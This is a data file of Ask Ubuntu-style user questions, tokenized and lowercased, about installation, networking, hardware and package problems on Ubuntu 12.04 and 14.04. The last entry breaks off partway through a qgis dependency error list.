489411	xubuntu install on multi hard drive system with windows 8	i currently have ubuntu 12.04 installed on a 320gb hdd , windows 8.1 on a 640gb hdd , and i have another 1tb hdd . i 'd like to wipe/format the 320gb hdd with ubuntu install and install xubuntu on the 1tb drive . i 'm extremely new to linux but here 's where i 'm at . i downloaded the xubuntu iso , created a boot disk and i 'm at the installation type menu . there is no option to do what i want in the main menu so i select something else . i have a couple of questions here . is there a way i can just format the ubuntu 320gb hdd from this menu ? there is a format ? column with a checkbox , but i ca n't check it . i actually ca n't format any drive , even the 1tb which is empty . also , could i just select the 1tb drive , and would it create all the necessary partitions , for example a separate swap and boot partition ? i 've been reading this diskspace guide but i do n't really understand the gpt disk type . how would i check this from the xubuntu install ? if i have to create all the partitions manually , i 'm not sure when to use primary vs logical , and what the mount point is for ? update : selected swap and it looks like i do n't have to choose primary or logical . still curious what the difference is in layman 's terms . any help would be appreciated . i have googled quite a bit but most guides i 've seen are for dual booting from same hdd and do n't talk about the partition types etc ...
489414	how to re-enable kubuntu application launcher menu shortcuts after accidentally disabling	i just installed kubuntu 14.04 and i 'm in the process of customizing it . i replaced the default application launcher with the traditional-style application launcher menu . with this application launcher , you can assign shortcut keys to specific applications ( by navigating to the advanced settings for a particular application in the edit menu view ) . i assigned shortcut keys to a few applications and tested , and everything worked . then i went through every item in the system settings and set my preferences . but somewhere along the way i disabled the application launcher shortcut keys . in the menu editor , they are still set as i defined them , and under the `` global keyboard shortcuts '' system config in the `` khotkeys '' section , i also see them defined . but they just do n't work anymore . is there some system setting that would cause this to be disabled ? how do i re-enable these shortcuts ?
489418	keyboard shortcut shift + ctrl + escape does not work	i am using ubuntu 14.04 x64 w/ unity . i like how the task manager shows up in windows with shift+ctrl+escape . so i tried creating a similar keyboard shortcut in ubuntu with the command gnome-terminal -e htop . nothing happens when invoking that shortcut . however , if i assign a different combination , say ctrl+alt+h , it works fine . what am i doing wrong ? is shift+ctrl+escape reserved or something ? it used to work perfectly in 13.10 and before .
489421	my website is accessible on my home network but nobody else can access it on the internet	this is my first server i 've set up so bare with me if i lack any important details . i have set up my ubuntu server and have my site working on my home network , i am able to see my website on all devices connected to my router but beyond that nobody else can see it . i have a belkin ( f9j1002 v1 ) router which i have set up port forwarding to my server 's ip . to rule out any port issues with my isp i have called them and they said that they do allow port 80 traffic . to be certain i forwarded port 80 to my laptop and used a program called pfportchecker which determined that i do have access to port 80 . my website should be located at 192.168.2.11 i have associated it with the domain www.shekko4444.com if anybody could help i would be so grateful , let me know if you need me to post more info . thanks .
489425	tty1 doesnt work	when the system starts up it shows all of the processes starting but it stops at starting cups printing spooler/server what fails to start up gnome display manager [ fail ] im not sure if there are any else gdm is the only one i can see i cant go up ( cant use page up ) things i recently did uninstalled gnome all tty 's work except tty1 what it does is it shows ubuntu 14.04 lts pcname tty1 pcname login : myusername password : itypedinmypassword when i press enter is shows this password : password : then i type it in again then it shows the login screen again and if i type anything itll show the command being used but flashes that for a second
489427	how to bring up a network interface only if it is physically present in ubuntu 14.04 ?	this is a follow-up on my old question : what would be the best way to make kernel bring a network interface up only if it is physically plugged in ? so , if it does n't exist , just move on with initializing other interfaces ( if any ) and continue to the login screen , without `` waiting for network configuration '' delay . the solution then came up with then was the following in etc/network/interfaces , it used to work in 12.04 : auto wlan9 iface wlan9 inet manual wpa-ssid myssd wpa-psk mykey wpa-proto rsn wpa-pairwise ccmp wpa-group ccmp wireless-power off pre-up if [ -f /sys/class/net/wlan9/operstate ] ; then ifconfig wlan9 up ; fi up if [ -f /sys/class/net/wlan9/operstate ] ; then dhclient wlan9 ; fi unfortunately , it stopped working once i upgraded to 14.04 trusty tahr . if the interface is physically absent ( i.e . the usb wifi card unplugged ) , i again experience the 2 minutes `` waiting for network configuration '' delay . how can i get the same logic working in 14.04 ?
489430	how can i force low graphics mode ?	i just installed ubuntu 12.04 on my powermac g5 , and it is really laggy . i was wondering if i could enable low graphics mode , it would make it run faster . the problem is ... . i do n't know how .
489432	`` last known working configuraition ''	is there a way to make ubuntu have a last known working configuration . windows has this as standard and can be accessed at the boot menu . iâve asked this question in the irc channels and the best that can be recommend is reverting kernels at the boot menu or lvm i found an application called timeshift for ubuntu but lacks the boot menu options and doesnât work on servers . can anybody recommend something closer to `` last known working configuration ``
489434	after nvidia 331 and bumblebee install , opengl reverts to old version	i recently installed bumblebee and the nvidia 331 driver , because apparently this was the only way to get my geforce 860m to work . now , when i try to compile opengl programs , it behaves as if i have a pre-2.0 version of opengl ( `` error : glfoo was not declared in this scope '' for shader-related functions like gluniform1f ) . these errors occur when trying to compile programs that were able to compile before , using the same makefiles as before . the only way i 've found to get around this is to use glew , which is unfortunate because i am a t.a . for an opengl class and need to be able to run students ' assignments on my machine , and their assignments will not be using glew . glxinfo tells me that i have opengl version 3.0 , but the only programs that will compile are ones that are written for pre-2.0 . did bumblebee/nvidia replace one of my opengl libraries with an older version or something ? how can i fix this ?
489435	ca n't connect to vpn on ubuntu 14.04	i am new to ubuntu . i have configured vpn set-up on ubuntu 14.04 but could not connect . system log shows following errors : jun 28 13:35:50 rana-laptop kernel : [ 9723.920954 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled jun 28 13:35:50 rana-laptop kernel : [ 9723.923177 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed jun 28 13:35:50 rana-laptop kernel : [ 9723.923186 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through jun 28 13:36:10 rana-laptop pppd [ 11154 ] : lcp : timeout sending config-requests jun 28 13:36:10 rana-laptop pppd [ 11154 ] : connection terminated . jun 28 13:36:10 rana-laptop avahi-daemon [ 477 ] : withdrawing workstation service for ppp0 . jun 28 13:36:10 rana-laptop networkmanager [ 857 ] : vpn plugin failed : 1 jun 28 13:36:10 rana-laptop networkmanager [ 857 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) jun 28 13:36:10 rana-laptop pppd [ 11154 ] : modem hangup jun 28 13:36:10 rana-laptop networkmanager [ 857 ] : vpn plugin failed : 1 jun 28 13:36:15 rana-laptop pppd [ 11154 ] : child process /usr/sbin/pptp 202.191.127.194 -- nolaunchpppd -- loglevel 0 -- logstring nm-pptp-service-11148 ( pid 11156 ) terminated with signal 15 jun 28 13:36:15 rana-laptop pppd [ 11154 ] : exit . jun 28 13:36:15 rana-laptop networkmanager [ 857 ] : vpn plugin failed : 1 jun 28 13:36:15 rana-laptop networkmanager [ 857 ] : vpn plugin state changed : stopped ( 6 ) jun 28 13:36:15 rana-laptop networkmanager [ 857 ] : vpn plugin state change reason : 0 jun 28 13:36:15 rana-laptop networkmanager [ 857 ] : policy set 'symphony w90 ' ( wlan0 ) as default for ipv4 routing and dns . jun 28 13:36:15 rana-laptop networkmanager [ 857 ] : error disconnecting vpn : could not process the request because no vpn connection was active . jun 28 13:36:20 rana-laptop networkmanager [ 857 ] : vpn service 'pptp ' disappeared jun 28 13:36:42 rana-laptop kernel : [ 9775.637094 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled jun 28 13:36:42 rana-laptop kernel : [ 9775.639341 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed jun 28 13:36:42 rana-laptop kernel : [ 9775.639349 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through jun 28 13:37:34 rana-laptop kernel : [ 9827.349249 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled jun 28 13:37:34 rana-laptop kernel : [ 9827.351489 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed jun 28 13:37:34 rana-laptop kernel : [ 9827.351494 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through jun 28 13:37:46 rana-laptop pptp [ 11160 ] : nm-pptp-service-11148 warn [ open_inetsock : pptp_callmgr.c:329 ] : connect : connection timed out jun 28 13:37:46 rana-laptop pptp [ 11160 ] : nm-pptp-service-11148 fatal [ callmgr_main : pptp_callmgr.c:127 ] : could not open control connection to 202.191.127.194 jun 28 13:37:46 rana-laptop pptp [ 11158 ] : nm-pptp-service-11148 fatal [ open_callmgr : pptp.c:487 ] : call manager exited with error 256 ++++++++++++++++++++++++++++++++++++++++++ i do n't understand what went wrong . please help .
489438	back file from imac	i am trying to backup files from my imac using ubuntu live cd , but it wont allowed me to , because of the file system type , imac partition type using the hfs/hfs+ system , i 've tried run as root , still it wont allow me to copy , i 've also tried run the nautilus as root , also ca n't get it , anyone please guide me to save my file , thanks
489440	how to get autofs working in 14.04 lts	i just upgraded from 12.04 lts to 14.04 lts and autofs is broken again . in the past there was some pre-start mumbo jumbo that one could add to /etc/init/autofs.conf and it would work , but it depended on statd which does n't seem to exist in 14.04 . any suggestions/pointers would be much appreciated . more info : i have removed & upgraded as suggested below but this had no observable effect . dmesg produces *** many similar lines preceed these *** [ 21.979136 ] init : autofs main process ended , respawning [ 22.330945 ] init : autofs main process ended , respawning [ 22.582115 ] init : autofs respawning too fast , stopped i added this to my /etc/rc.local # desperate attempt to get autofs working ... ( sleep 15 ; /etc/init.d/autofs restart ) and it 'works ' .
489441	want to know how how secure my system is with current settings	my system is at kernel 3.15.2 mainline . i have enabled the firewall with all ports closed . i have very strong passwords set for bios , drive encryption , and login ssh is disabled . i have installed https everywhere on my browser . oh and what kind of program will allow me to wipe free space with a gutmann delete . thanks in advance , doubledogdare610 . p.s . my system is a laptop . so the cmos battery is hard to find .
489442	xubuntu issue - where are the default desktop icons disapeared ?	i 'm running xubuntu 14.04 lts and for some reason the default desktop icons ( trash , file system , and home ) have disappeared ? anyone have any ideas where they went and how to get them back ?
489445	will ubuntu degrade my macbook pro battery ?	i used ubuntu on my previous laptops and it was very common that after i use ubuntu on my laptop the battery almost always degraded . the batteries on my old laptops were lion .
489448	after installing ubuntu touch dualboot recovery is lost	i installed ubuntu touch dualboot app by following instructions from the ubuntu wiki . installation of ut went fine and i can use the dualboot function properly . however , i see now , my recovery partition is lost . i can not reboot into the recovery . i have tried rebooting into recovery from the bootloader , and also have tried giving the command adb reboot recovery . every time i do that , it boots into the ubuntu partition instead of the recovery . is there any way i can fix this ? i am using nexus 5 .
489452	plymouth script update and 'initramfs âu ' quadrupled fsck time	i am running ubuntu 10.04 netbook remix . i updated my plymouth script for my splash screens and ran initramfs -u to use the new plymouth script . after doing this my fsck time at bootup went from about 5 minutes to over 20 minutes . i checked my disk usage for /dev/sda1 and it went from 3527472 k to 4769008 k ( a 35 % increase ) . this is for customer installations around the world and this increase in boot times would not be acceptable . i figure i must be doing something wrong , but do not know what i should be doing instead . any help or suggestions would be greatly appreciated . update : i tried an experiment and turned the splash screens off by removing quiet splash and the boot time when down to 1 minute 36 seconds . there definitely seems to be an interaction between plymouth and fsck . could they be competing for memory space or something like that ? thanks !
489453	`` manage external tools '' not popping up dialog	i enabled the `` external tools '' plugin for gedit . i clicked on tools > manage external tools , but it did n't pop up a dialog . it did nothing . what did i do wrong ? how can i re-install this plugin ?
489454	how can i install ubuntu in my toshiba chromebook ?	in order to use some programs i would like to find out if the ubuntu can be install in my toshiba chromebook . thank you .
489455	lubuntu 14 does not recognize 3g modem	huawei 3g modem was usually recognized in lubuntu 12 but starting from version 14 or the network icon appears over . and now ?
489456	totally remove unity from ubuntu 14.04 with its dependencies and configurations	my unity is damaged . i need to reinstall it but when i reinstall it nothing changes . nothing is fixed . i tried reinstalling it from the software centre . ( packages `` ubuntu-desktop '' and `` unity '' ) . i also tried running this : sudo apt-get autoremove -- purge ubuntu-desktop then sudo apt-get install ubuntu-desktop . no good . nothing changes . i think this is because when i uninstall it i do n't uninstall its dependencies . i do n't know . this source ( and others ) said to run this to remove unity : sudo apt-get remove unity unity-2d unity-2d-common unity-2d-panel unity-2d-shell unity-2d-spread unity-asset-pool unity-common unity-lens-applications unity-lens-files unity-lens-music unity-lens-video unity-scope-musicstores unity-scope-video-remote unity-services indicator-messages indicator-status-provider-mc5 appmenu-qt appmenu-gtk appmenu-gtk3 lightdm unity-greeter overlay-scrollbar zeitgeist zeitgeist-core zeitgeist-datahub activity-log-manager-common activity-log-manager-control-center . but they were talking about 12.04 specifically . will it work for 14.04 ? ( and i will add purge to this command too ) . ... as for what exactly is damaged , you can look here
489457	how to reinstall a theme ?	my ambiance theme was corrupted but i ca n't figure out how to fix it or reinstall it . ( also i ca n't find it on the web to reinstall it ) . what do i do to fix it ?
489458	i need help with controlling the fan rpm !	i have recently installed ubuntu 14.04 on my acer laptop and i noticed the fan is always on , with cpu usage sitting around 1-20 % . just wondering if there is some way i can control the rpm to make it less noticeable . even if i have to set a custom fan curve .
489459	how do i change the ubuntu loading screen ?	after i installed `` kubuntu-desktop '' my loading screen was changed : to this : how do i change it back ?
489463	what are the default settings for grub customiser ?	my grub 's appearance settings were altered . grub customiser can change it back to what it was but sadly there 's no `` default button '' . what are the default appearance settings ?
489464	please help , cant open files/folders after upgrade , emergency	help me please : ( , i recommended to a friend to upgrade from 12.04 to 14.04 , but he had no backup of his files . when the upgrade proccessfinished and he rebooted his laptop , after login , he tried t open a file in his desktop , but none of them opened , the screen just frezed a second and his files were gone for a moment , after that all the file came back , but still without been able to open them . i check the files from a terminal and only showed some of the files that he had , not all that appears on nautilus . and that files can be opened with no problems . please , please help me , he has very important files in his laptop , this an emergency .
489471	firefox not loading plugins and previous session at start	until 2 days ago firefox ( ubuntu 14.04 ) was fine and started with the previous session tabs . but now even if i did n't change anything it always starts with `` ubuntu start page '' i checked the setting `` when firefox starts : '' - > `` show my windows and tabs from last time '' , so i guess this is right . furthermore some of my add-ons like reddit enhancement suite are not loaded correctly ( i have to disable-enable them in order to let them work every time i start firefox ) , while others like gmail watcher still work . there is some preference file that has been updated and i should change ? thank you for your help .
489474	firefox 30 crashes with html5 video	firefox 30 ( beta ) crashes for every html5 video for me . using ubuntu gnome 14.04. some reports : https : //crash-stats.mozilla.com/report/index/bc5ff4ad-486d-42a5-a146-1c8a62140622 https : //crash-stats.mozilla.com/report/index/d018e6cf-62a9-49cd-8a76-d77162140629 neither running in safe mode , nor with a new profile , fixes the crashes , which logically makes me guess , it 's a system side problem . i do n't know what changed , when the crashes started happening . previously had gstreamer0.10-ffmpeg and some other gstreamer0.10 packages installed . to get h264 video i installed the ppa listed here : how do i get html5 h.264 video working on firefox ? this worked perfectly . just now after the crashes i purged the ppa and also un-installed the gstreamer0.10 packages . what can i do to troubleshoot this further and fix it ? it 's so frustrating , especially after migrating from chrome , that one crash closes my whole browser .
489476	how to fix frozen gui from cli without restarting/killing any applications ?	after the killall nautilus command the gui froze . i was running some applications for few days and it will take few more days to finish . therefore . i do not want to restart the computer . i checked the logs of those applications using tail command in cli and it seems that the applications are running fine . now when i go to the gui mode , i get a black screen with a pointer and nothing else . is there a way to fix the gui without restarting/killing the applications ?
489477	make [ 1 ] leaving directory error	when i run make command for patching crcn on ns2 under ubuntu 12.04 , i am faced with this error : make [ 1 ] : entering directory `/home/apadana/ns-allinone-2.31/ns-2.31/indep-utils/cmu-scen-gen/setdest' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/apadana/ns-allinone-2.31/ns-2.31/indep-utils/cmu-scen-gen/setdest' make [ 1 ] : entering directory `/home/apadana/ns-allinone-2.31/ns-2.31/indep-utils/webtrace-conv/dec' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/apadana/ns-allinone-2.31/ns-2.31/indep-utils/webtrace-conv/dec' make [ 1 ] : entering directory `/home/apadana/ns-allinone-2.31/ns-2.31/indep-utils/webtrace-conv/epa' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/apadana/ns-allinone-2.31/ns-2.31/indep-utils/webtrace-conv/epa' make [ 1 ] : entering directory `/home/apadana/ns-allinone-2.31/ns-2.31/indep-utils/webtrace-conv/nlanr' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/apadana/ns-allinone-2.31/ns-2.31/indep-utils/webtrace-conv/nlanr' make [ 1 ] : entering directory `/home/apadana/ns-allinone-2.31/ns-2.31/indep-utils/webtrace-conv/ucb' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/apadana/ns-allinone-2.31/ns-2.31/indep-utils/webtrace-conv/ucb' what 's wrong ? i would be grateful if somebody could help me . thanks in advance .
489480	ubuntu not detecting huawei ec178 modem	i have a huawei ec178 3g modem . i had huawei mobile partner installed . i removed it 's autostart launcher and indicator-application-service from startup applications . as a result ubuntu have stopped detecting my modem . to fix this i tried following steps but no success . re-entered these two applications in startup . re-installed huawei mobile partner . tried what is suggested on here . tried what is suggested here too . modem manager is not detecting it either . ubuntu only detects modem as storage device . i tried to connect my modem on an other system to confirm whether this issue is with device it self , but device was connected successfully on that system . ouput of lsusb bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 008 device 002 : id 413c:8133 dell computer corp. wireless 5720 vzw mobile broadband ( evdo rev-a ) minicard gps port bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 002 : id 12d1:1505 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 002 : id 0a5c:5800 broadcom corp. bcm5880 secure applications processor bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub output of usb-devices t : bus=07 lev=01 prnt=01 port=01 cnt=01 dev # = 3 spd=12 mxch= 0 d : ver= 1.10 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=12d1 prodid=1505 rev=00.00 s : manufacturer=huaÿwei technologies s : product=huawei mobile s : serialnumber=ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ c : # ifs= 1 cfg # = 1 atr=a0 mxpwr=500ma i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage edit : it seems that my modem is being detected but not working properly . when i ran sudo wvdial console output was : ~ : \ > sudo wvdial -- > wvdial : internet dialer version 1.61 -- > initializing modem . -- > sending : atz atz ok -- > sending : atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 ok -- > modem initialized . -- > sending : atdt # 777 -- > waiting for carrier . atdt # 777 where it hung on last line . wvdial.conf is [ dialer defaults ] init1 = atz init2 = atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 modem type = analog modem baud = 460800 new pppd = yes modem = /dev/ttyusb0 isdn = 0 phone = # 777 password = ptcl username = vwireless @ ptcl.com
489482	change the unity launcher search provider	if i enter a term that gives no hits in applications etc . i will automatically redirected to the yahoo search page . how can i change the search provider there ? i found out , that the content-search is enabled in the settings : gsettings list-recursively |grep remote-content-search this will show com.canonical.unity.lenses remote-content-search 'all' is this related ? or where can i set the automated search to another provider ?
489483	installation and use of lapack 3.5.0 on ubuntu 14.04	i am facing problems while installation of lapack 3.5.0 , and i have already seen this nicely written answer , but i did n't understand anything out of it ( as op was knowing what problem he is facing ) . but i am new to lapack , so never used it before , if you can help me from scratch , i will be very thank full to you . i have already edited some of the files as directed here , but they have given lot more information than that , which may be required for the installation of the same , due to this extra information , i am not able to proceed further . need you help . thanks in advance . note : i am installing fortran version , i do n't know how to use it . help me , in that issue .
489484	hdmi monitor : cable not connected , but `` visible '' in the pc ( ubuntu 14.04 )	i have a monitor connected via hmdi to my laptop . then i connected it with a tv via hdmi to watch a movie . when i connected it back to the monitor the monitor shows only : cable not connected the output of xrandr shows : screen 0 : minimum 320 x 200 , current 3286 x 1080 , maximum 32767 x 32767 lvds1 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1366x768 59.9*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1920x1080+1366+0 ( normal left inverted right x axis y axis ) 598mm x 336mm 1920x1080 60.0*+ 50.0 59.9 1920x1080i 60.1 50.0 60.0 1680x1050 59.9 1280x1024 75.0 60.0 1440x900 59.9 1280x960 60.0 1280x800 59.9 1152x864 75.0 1280x720 60.0 50.0 59.9 1440x576i 50.1 1024x768 75.1 70.1 60.0 1440x480i 60.1 60.1 832x624 74.6 800x600 72.2 75.0 60.3 56.2 720x576 50.0 720x480 60.0 59.9 640x480 75.0 72.8 66.7 60.0 59.9 720x400 70.1 dp1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) and as far as i know this means that the 2nd screen is recognized by the laptop . i can also see the desktop when i look at the `` desktop switchers '' . does anyone has an idea ? thanks a lot
489491	what 's in this 524mb drive ?	i have recently installed ubuntu 14.04 on my dual boot pc with windows 8.1 . on ubuntu i have seen a 524 mb drive popped up . as i take a look at it , its not swap or anything . its content are as follows can i delete the partition and extend the 104 gb partition ? or i should leave it as it is .
489493	missing sbin/hotplug in ubuntu	im using ubuntu and i can not find /sbin/hotplug . did anything replace it ? how does it handle hotplugging ? i read that kernel calls it for notifying user space when an hotplug event happens . i also checked /proc/sys/kernel/hotplug , but its empty
489496	how to see command history ?	i recently saw an article on the internet . using that by typing the first letter and pressing ↑ would show me the command starting with that letter . for example let this be my command history : sudo -s ls nautilus now if i type s and press ↑ would show me sudo -s how can i acheive this ?
489497	store the return string to a variable from zenity	i am using zenity tool to pop-up an entry dialog box . but how can i store the value entered into the text box to a variable ? now , the string is being printed onto the console itself . i want it to be stored into a variable to process it !
489499	are ubuntu upgrades signed or encrypted ?	when you download updates from the standard software updater ( which i 'm assuming is just a graphical front-end for apt ) , are these updates signed or encrypted between the server and the user , or are they susceptible to `` man-in-the-middle '' attacks ? if they are not secure , are there alternative update/installation methods that allow for signed or encrypted updates ?
489500	clearing disk space at command line while fixing low graphics mode problem	so my ssd is completely full and i cant access the desktop to be able to delete these files . i need help on how to set the command to delete the files of a particular folder ie videos
489503	installing express scribe	i have recently moved from windows to linux , have installed ubuntu 14.04 . for my transcription job , i was using express scribe player on my windows machine . the express scribe site has two options ( http : //www.nch.com.au/scribe/linux.html ) for installing the player on a linux machine . one is 'compiled binary program made for linux ' and the other is installing wine and then installing windows version of the player through wine . i chose to try the first one ( compiled binary ) . it was in a .tar.gz , from which i could extract a file ( shell script ) and then when i ran the script ( sudo sh < filename > ) in a terminal , i am getting the following : please wait while the installer is initializing ... .. release date : fri jan 30 00:51:58 ist 2009 express scribe 4.31 ./install.sh : line 21 : /tmp/selfextract.o2egvm/bin/scribe : no such file or directory installation cancelled i do not know if i am doing something wrong here . as i stated above , i am new to linux . please help me . thank you
489505	how to install all the compiz plugins ( excepting those which are unsupported or experimental ) on ubuntu 14.04 ?	i just bought a hp laptop yesterday and i 've installed ubuntu 14.04 on it . i want some awesome compiz plugins ( like cube rotation , cube deformation , fire painting , water , etc . ) , but i do n't know how to install them and i do n't remember how i installed them on my desktop , which runs ubuntu 12.04 , so please tell me what to do ( as clear as possible ) .
489508	no swap - easy way to add ?	my ubuntu has no swap space . apparently you can run a swap file on an existing partition - is that true ? i 'd like to add one , but the online instructions are all rather complicated and require the terminal . i have no idea what i do there , so i avoid it . is n't there a utility that can sort out the swap thing - maybe a tweak in gparted or something ? thanks , james
489510	xubuntu 14.04 making strange connections	i recently installed xubuntu and i have noticed my new os making some strange connections . i have made sure to close everything that would have a reason to make any connection like the music player ( album art ) or the software center or whatever . alas , when i run the command : ss -tpras it returns : state recv-q send-q local address : port peer address : port listen 0 5 system : domain * : * listen 0 128 localhost : ipp * : * close-wait 1 0 172.18.24.13:38304 backoo.canonical.com : http users : ( ( `` gvfsd-http '' ,4740,10 ) ) close-wait 1 0 172.18.24.13:38305 backoo.canonical.com : http users : ( ( `` gvfsd-http '' ,4740,14 ) ) close-wait 1 0 172.18.24.13:38303 backoo.canonical.com : http users : ( ( `` gvfsd-http '' ,4740,13 ) ) close-wait 1 0 172.18.24.13:38307 backoo.canonical.com : http users : ( ( `` gvfsd-http '' ,4740,16 ) ) close-wait 1 0 172.18.24.13:38306 backoo.canonical.com : http users : ( ( `` gvfsd-http '' ,4740,15 ) ) close-wait 1 0 172.18.24.13:38247 backoo.canonical.com : http users : ( ( `` gvfsd-http '' ,4740,12 ) ) listen 0 128 ip6-localhost : ipp : : : * i can not seem to figure out why these connections are being made . i find that others are having the same issue , yet i have not found a case where `` gvfsd-http '' connects to , and leaves an open connection to `` backoo.canonical.com '' . i have found articles like this one : strange connections by gvfsd-http -- spawner but it always seems to be connecting to somewhere else . so i am left with the question : exactly what is this , and why is it even trying to make connections to this server ? i 'm kind of paranoid person so needless to say i 've been watching this connection for some time now . has anybody else found this happening to them ? can anybody here can shed some light on this ? help is always appreciated , thanks . ps : xubuntu 14.04 recent install , everything updated ( repo downloads only )
489511	recovering one specific deleted file	i am trying to recover one file , whose name i know , that i accidentally deleted using rm . i am using foremost and specifying the file extension ( zip ) : sudo foremost -w -t zip -i /dev/sdc1 -o /recoverydir where /dev/sdc1 is the filesystem where the file is located ( which i have already unmounted ) and recoverydir is the directory where i am saving recovered files to . with the command above the option -w only gives an audit but does not recover anything . the problem is that there are way too many files that match the criteria and i would like to narrow it down to the file 's exact name or even the approximate size , which i know . how can this be done with foremost or another tool ?
489514	i ca n't upgrade qgis 2.4 some error on depends not be solved	how to solve this ? python-qgis : depends : python-qgis-common ( = 2.4.0+precise1 ) but 2.4.0+precise1 is to be installed depends : libc6 ( > = 2.14 ) but 2.19-0ubuntu6 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libpython2.7 ( > = 2.7 ) but 2.7.6-8 is to be installed depends : libqt4-network ( > = 4:4.5.3 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqt4-xml ( > = 4:4.5.3 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libspatialite3 ( > = 2.4.0~rc2 ) but it is not going to be installed depends : libsqlite3-0 ( > = 3.5.9 ) but 3.8.2-1ubuntu2 is to be installed depends : libstdc++6 ( > = 4.1.1 ) but 4.8.2-19ubuntu1 is to be installed depends : python ( > = 2.7.1-0ubuntu2 ) but 2.7.5-5ubuntu3 is to be installed depends : sip-api-8.1 but it is not going to be installed qgis : depends : libc6 ( > = 2.14 ) but 2.19-0ubuntu6 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libgdal1-1.7.0 but it is not going to be installed depends : libgeos-c1 ( > = 3.2.2 ) but 3.4.2-4ubuntu1 is to be installed depends : libqt4-network ( > = 4:4.6.1 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqt4-sql ( > = 4:4.5.3 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqt4-svg ( > = 4:4.5.3 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqt4-xml ( > = 4:4.5.3 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libspatialite3 ( > = 2.4.0~rc2 ) but it is not going to be installed depends : libsqlite3-0 ( > = 3.5.9 ) but 3.8.2-1ubuntu2 is to be installed depends : libstdc++6 ( > = 4.4.0 ) but 4.8.2-19ubuntu1 is to be installed depends : qgis-providers ( = 2.4.0+precise1 ) but 2.4.0+precise1 is to be installed depends : qgis-common ( = 2.4.0+precise1 ) but 2.4.0+precise1 is to be installed qgis-plugin-globe : depends : qgis ( = 2.4.0+precise1 ) but 2.4.0+precise1 is to be installed depends : qgis-plugin-globe-common ( = 2.4.0+precise1 ) but 2.4.0+precise1 is to be installed depends : libc6 ( > = 2.14 ) but 2.19-0ubuntu6 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libopenscenegraph80 but it is not going to be installed depends : libosgearth1 but it is not going to be installed depends : libqt4-network ( > = 4:4.5.3 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqt4-opengl ( > = 4:4.5.3 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqtcore4 ( > = 4:4.7.0~beta1 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.8.2-19ubuntu1 is to be installed qgis-plugin-grass : depends : qgis ( = 2.4.0+precise1 ) but 2.4.0+precise1 is to be installed depends : qgis-plugin-grass-common ( = 2.4.0+precise1 ) but 2.4.0+precise1 is to be installed depends : libc6 ( > = 2.15 ) but 2.19-0ubuntu6 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libgdal1-1.7.0 but it is not going to be installed depends : libqt4-svg ( > = 4:4.5.3 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqt4-xml ( > = 